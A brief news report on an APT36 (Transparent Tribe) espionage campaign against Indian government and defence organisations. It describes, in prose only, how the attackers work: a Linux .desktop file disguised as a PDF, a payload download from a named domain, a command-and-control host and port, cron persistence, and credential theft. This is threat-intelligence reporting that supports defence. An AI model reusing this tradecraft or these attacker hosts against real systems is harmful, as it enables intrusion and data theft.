Cyber-security researchers at CYFIRMA and CloudSEK have warned that the Pakistan-linked hacking group APT36, also known as Transparent Tribe, is running a new espionage campaign against Indian government and defence organisations. The attackers are sending spear-phishing e-mails that contain a zip archive titled “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”. Inside the archive is a Linux .desktop file that poses as a PDF but executes Bash commands to download and run a hex-encoded payload from securestore.cv while simultaneously displaying a harmless document in Firefox to avoid suspicion. The downloaded Go-based payload connects to a hard-coded command-and-control server, modgovindia.space:4000, where it receives further instructions, exfiltrates data and establishes persistence through cron jobs. Analysis shows the malware can carry out system reconnaissance, harvest credentials and deploy the Poseidon backdoor for long-term access and potential lateral movement. APT36 has a decade-long record of targeting Indian military and diplomatic assets and has recently expanded into education and civil-society sectors. The latest use of weaponised .desktop files reflects what researchers call a tactical shift aimed at exploiting BOSS, India’s Linux distribution, alongside the group’s traditional Windows-based tools. The campaign, first detected on 1 August and still active, underscores persistent risks to Indian critical infrastructure from state-aligned threat actors.